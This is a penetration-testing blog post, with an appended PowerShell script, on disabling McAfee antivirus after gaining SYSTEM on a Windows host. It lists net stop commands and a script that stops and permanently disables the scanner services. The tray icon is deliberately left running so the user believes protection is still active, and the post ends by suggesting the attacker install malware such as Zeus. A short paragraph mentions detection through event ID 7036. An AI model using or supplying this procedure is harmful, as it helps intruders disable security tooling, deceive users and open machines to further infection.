Tuesday, Jan 04 2011

Killing AV when it just will not Die!

So we have a shell or meterpreter session and have escalated to SYSTEM.  As NT AUTHORITY\SYSTEM we should be able to remove the pesky AV/HIPS products that keep getting in the way of completing our penetration test.

Metasploit ships an awesome meterpreter script called killav which defeats many AV products by killing their processes.  Sometimes, however, AV just will not die.

Listing the running processes shows the AV processes are all still there.  Once again I am picking on McAfee, but Symantec and friends use the same kind of setup: a handful of Windows services plus a tray process for the user to look at.

Killing the PID doesn't work either, because the scanner runs as a Windows service: the Service Control Manager simply starts it again (or the process is protected against termination in the first place).

However.......  If one were to run the following as SYSTEM (net stop takes the service display name and may prompt before stopping dependent services):

net stop "McAfee Framework Service"

net stop "McAfee McShield"

net stop "McAfee Engine Service"

Running the process list again shows McShield and his band of brothers are McGone!

It should be noted that we leave McTray.exe running so the user still sees the shield in the task bar and is not aware that AV protection has been disabled entirely.
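The same procedure as a PowerShell script, added here as an example and not taken from the original post: it resolves the three display names quoted above to service objects, stops them (with dependents) from an elevated session, checks that the McShield process is gone, and confirms McTray.exe is still there. It goes one step further than the post by also setting the services to Disabled so they do not come back on reboot; the variable names and the mcshield/McTray process-name checks are this example's own assumptions.

```powershell
# Added example, not code from the original post.
# Run from an elevated (SYSTEM or Administrator) PowerShell session.

# Service display names as given in the post.
$services = @(
    'McAfee Framework Service',
    'McAfee McShield',
    'McAfee Engine Service'
)

# Resolve display names to service objects; skip anything not installed on this
# host instead of failing half way through the list.
$targets = foreach ($name in $services) {
    $svc = Get-Service -DisplayName $name -ErrorAction SilentlyContinue
    if ($null -eq $svc) { Write-Warning "not installed: $name"; continue }
    $svc
}

foreach ($svc in $targets) {
    if ($svc.Status -ne 'Stopped') {
        # -Force also stops dependent services, the equivalent of answering
        # "Y" to net stop's "do you want to continue" prompt.
        Stop-Service -Name $svc.Name -Force -ErrorAction Stop
        $svc.WaitForStatus('Stopped', [TimeSpan]::FromSeconds(30))
    }
    # Beyond the post: without this the service comes back at next boot.
    Set-Service -Name $svc.Name -StartupType Disabled
}

# Verify: list all McAfee services and their state.
Get-Service -DisplayName 'McAfee*' | Select-Object Status, DisplayName

# mcshield.exe is assumed to be the on-access scanner process.
$scanner = Get-Process -Name mcshield -ErrorAction SilentlyContinue
if ($scanner) { Write-Warning "mcshield.exe still running (pid $($scanner.Id))" }
else          { Write-Output  'mcshield.exe gone' }

# McTray.exe is deliberately left alone so the tray icon keeps showing.
Get-Process -Name McTray -ErrorAction SilentlyContinue | Select-Object Id, ProcessName
```

Two caveats for anyone using this on an engagement or looking for it in logs: stopping a service is not silent, the Service Control Manager writes "entered the stopped state" events (ID 7036) to the System event log for each one, and some AV builds block Stop-Service or net stop with their own self-protection even for SYSTEM, in which case this method fails just like killav does.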

The attacker is now free to infect the machine with any payload they see fit.  Go Zeus?

